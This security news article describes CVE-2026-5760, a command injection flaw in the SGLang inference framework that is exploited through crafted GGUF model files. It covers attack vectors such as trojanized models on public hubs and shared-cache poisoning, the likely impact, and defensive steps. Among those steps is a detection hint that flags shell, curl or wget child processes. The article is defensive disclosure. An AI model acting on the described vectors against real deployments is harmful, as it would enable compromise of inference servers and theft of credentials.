# SGLang CVE-2026-5760 (CVSS 9.8) Enables Remote Code Execution via Malicious GGUF Model Files


A critical security flaw in SGLang, the widely deployed open-source large language model (LLM) serving framework, could allow attackers to achieve full remote code execution on inference servers by feeding the system a maliciously crafted GGUF model file. The vulnerability, tracked as CVE-2026-5760, carries a near-maximum CVSS score of 9.8 out of 10.0 and stems from a command injection flaw in how SGLang processes incoming model artifacts. For organizations running AI inference pipelines — whether on-premises, in cloud environments, or inside internal developer tooling — the vulnerability represents one of the more serious AI-infrastructure disclosures of the year.


## Background and Context


SGLang has become one of the go-to high-performance serving stacks for running large language models in production. Developed as an open-source project, it competes with frameworks like vLLM and TGI, offering a programming model specifically tuned for structured generation, multi-modal workloads, and high-throughput batching. Its popularity has grown sharply over the past year as enterprises, AI startups, and research labs race to operationalize open-weight models including Llama, Qwen, Mistral, and DeepSeek derivatives — many of which ship in the GGUF format popularized by the llama.cpp ecosystem.


That ubiquity is exactly what makes CVE-2026-5760 consequential. SGLang deployments frequently sit on internal networks with access to GPU clusters, user data, and downstream business applications. A flaw enabling unauthenticated or weakly-authenticated code execution on such a server collapses the trust boundary between "model loader" and "production host," effectively turning a shared inference node into a staging ground for broader compromise.


The disclosure fits into an emerging pattern across 2025 and 2026, where vulnerabilities in AI tooling — Ray, MLflow, Triton, ComfyUI, and others — have demonstrated that the ML/AI stack often lags behind traditional web infrastructure in security hardening. CVE-2026-5760 is the latest entry in that list.


## Technical Details


Researchers describe CVE-2026-5760 as a command injection vulnerability leading to arbitrary code execution, triggered through the parsing or loading path for GGUF model files. GGUF (GPT-Generated Unified Format) is a container format used to package quantized LLM weights along with metadata such as tokenizer configuration, architecture hints, and chat templates. Because GGUF files are generally treated as opaque data blobs, downstream tooling frequently shells out to helper utilities or invokes subprocesses during load, convert, or quantization steps.


The vulnerability appears to exist in a code path where attacker-controlled content from the GGUF file — likely a metadata field, template string, or filename component — is interpolated into a shell command or process invocation without sufficient sanitization. An attacker who can cause SGLang to load a malicious GGUF file can therefore achieve execution in the context of the serving process. In most deployments, that context is a privileged service account with access to GPU devices, local model caches, and often to cloud credentials mounted into the container.


Several attack vectors emerge from this class of flaw:


  • Direct upload: Environments that expose model-loading endpoints to end users (internal portals, research sandboxes, or "bring-your-own-model" SaaS) can be compromised by uploading a weaponized GGUF.
  • Supply-chain delivery: An attacker who pushes a trojanized model to a public hub such as Hugging Face could compromise any downstream SGLang deployment that pulls the model by name.
  • Cache poisoning: If an organization shares a model cache volume across clusters, a single malicious artifact can trigger execution on every server that subsequently loads it.

  • The CVSS 9.8 rating — consistent with network attack vector, low complexity, no privileges required, and high impact to confidentiality, integrity, and availability — underscores that exploitation does not require elevated access on the target system.


    ## Real-World Impact


    The practical risk extends beyond the inference server itself. In a typical enterprise deployment, a compromised SGLang host is positioned to:


  • Exfiltrate proprietary fine-tuned weights and training data stored in adjacent volumes.
  • Harvest secrets such as Hugging Face tokens, cloud IAM credentials, and API keys for downstream services.
  • Pivot into internal networks via the model's outbound connectivity to monitoring, logging, or orchestration systems.
  • Manipulate model outputs — a subtle and potentially long-lived supply-chain attack against any application relying on the compromised endpoint.

  • For regulated industries deploying SGLang inside healthcare, finance, or legal workflows, the blast radius is particularly concerning. An RCE on an inference node that processes customer prompts could, depending on architecture, expose sensitive session data in transit through the model.


    ## Threat Actor Context


    No in-the-wild exploitation has been publicly confirmed at the time of reporting. However, threat actors have increasingly targeted AI infrastructure. Groups tracked by researchers have previously exploited flaws in Ray, H2O.ai, and MLflow to mine cryptocurrency, steal proprietary models, or establish persistence inside AI-heavy organizations. Given the CVSS rating and the relative simplicity of weaponizing a GGUF payload, security teams should assume that proof-of-concept exploit code will surface quickly once technical write-ups circulate. Hugging Face's open model ecosystem — which hosts hundreds of thousands of GGUF files — provides a natural distribution channel for opportunistic attackers.


    ## Defensive Recommendations


    Organizations running SGLang should treat CVE-2026-5760 as an urgent patching priority. Recommended actions include:


    1. Upgrade immediately to the fixed SGLang release as soon as maintainers publish the patched version, and review release notes for the exact affected version range.

    2. Audit model provenance. Only load GGUF files from trusted sources. Pin model versions by cryptographic hash rather than by tag or name to prevent silent substitution.

    3. Isolate inference workloads. Run SGLang with the least privilege possible: a dedicated service account, read-only file systems where feasible, seccomp/AppArmor profiles, and network egress restricted to required destinations.

    4. Segment the model cache. Avoid sharing writable model caches across untrusted tenants, clusters, or environments.

    5. Monitor for anomalous process activity. Alert on unexpected child processes spawned by the SGLang server — shell binaries, curl/wget, or compilers are strong indicators of exploitation.

    6. Restrict upload paths. If end users can submit model files, require signed artifacts, scan them in a sandbox before loading, and disable any "load arbitrary GGUF" features unless strictly required.

    7. Rotate exposed secrets. If exploitation is suspected, rotate all credentials reachable from the inference host, including Hugging Face tokens and cloud role credentials.


    ## Industry Response


    The disclosure arrives amid a broader push to bring AI infrastructure under the same security discipline applied to traditional application stacks. CISA's recent guidance on securing AI systems, NIST's AI RMF, and emerging frameworks such as MITRE ATLAS all emphasize the need to treat models as untrusted input. Hugging Face has been steadily expanding its malware scanning and "pickle" detection capabilities, and several vendors now offer model-scanning tools specifically aimed at detecting malicious metadata and deserialization payloads.


    Expect maintainers of adjacent frameworks — vLLM, TGI, llama.cpp bindings, and Ollama — to conduct similar audits of their GGUF handling paths. Security researchers are likely to publish deeper technical analyses in the coming weeks, and defenders should watch for Snort, Suricata, and EDR signatures targeting exploitation attempts against SGLang endpoints.


    CVE-2026-5760 is a reminder that in the AI era, a model file is not just data — it is executable attack surface.


    ---


    **